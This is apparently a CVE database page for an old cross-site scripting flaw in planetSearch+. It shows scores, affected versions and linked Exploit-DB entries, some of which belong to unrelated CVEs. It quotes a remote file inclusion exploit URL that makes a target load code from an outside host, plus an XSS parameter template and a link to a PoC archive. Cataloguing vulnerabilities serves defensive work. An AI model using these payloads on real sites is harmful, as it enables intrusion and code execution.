CVE-2006-1801
published 2006-04-18CVE-2006-1801: Cross-site scripting (XSS) vulnerability in planetsearchplus.php in planetSearch+ allows remote attackers to inject arbitrary web script or HTML via the…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.88%
76.9th percentile
Cross-site scripting (XSS) vulnerability in planetsearchplus.php in planetSearch+ allows remote attackers to inject arbitrary web script or HTML via the search_exp parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| planet_concept | planetsearch | <= 2005-10-26 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Boite de News 4.0.1 - 'index.php' Remote File Inclusion
exploitdb·2006-08-09
CVE-2006-4123 Boite de News 4.0.1 - 'index.php' Remote File Inclusion
Boite de News 4.0.1 - 'index.php' Remote File Inclusion
---
########################################################################
# Boite de News v4.0.1 Remote File Inclusion Vulnerability
#
# Download: ftp://ftp1.comscripts.com/PHP/1801_boiteden-401.zip
#
# Found By: the master
#
########################################################################
# exploit:
#
# http://[Target]/[Path]/boitenews4/index.php?url_index=http://cmd.gif?
########################################################################
# milw0rm.com [2006-08-09]
Exploit-DB
libextractor 0.5.13 - Multiple Heap Overflows (PoC)
exploitdb·2006-05-17
CVE-2006-2458 libextractor 0.5.13 - Multiple Heap Overflows (PoC)
libextractor 0.5.13 - Multiple Heap Overflows (PoC)
---
# libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1801.zip (05172006-libextho.zip)
# milw0rm.com [2006-05-17]
Exploit-DB
PlanetSearch + - 'Planetsearchplus.php' Cross-Site Scripting
exploitdb·2006-04-13
CVE-2006-1801 PlanetSearch + - 'Planetsearchplus.php' Cross-Site Scripting
PlanetSearch + - 'Planetsearchplus.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17527/info
PlanetSearch + is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/planetsearchplus.php?search_exp=[XSS]
No writeups or analysis indexed.
http://d4igoro.blogspot.com/2006/04/planetsearch-xss-vulnerabilities.htmlhttp://secunia.com/advisories/19681http://www.securityfocus.com/archive/1/431033/100/0/threadedhttp://www.securityfocus.com/bid/17527http://www.vupen.com/english/advisories/2006/1368https://exchange.xforce.ibmcloud.com/vulnerabilities/25832http://d4igoro.blogspot.com/2006/04/planetsearch-xss-vulnerabilities.htmlhttp://secunia.com/advisories/19681http://www.securityfocus.com/archive/1/431033/100/0/threadedhttp://www.securityfocus.com/bid/17527http://www.vupen.com/english/advisories/2006/1368https://exchange.xforce.ibmcloud.com/vulnerabilities/25832
2006-04-18
Published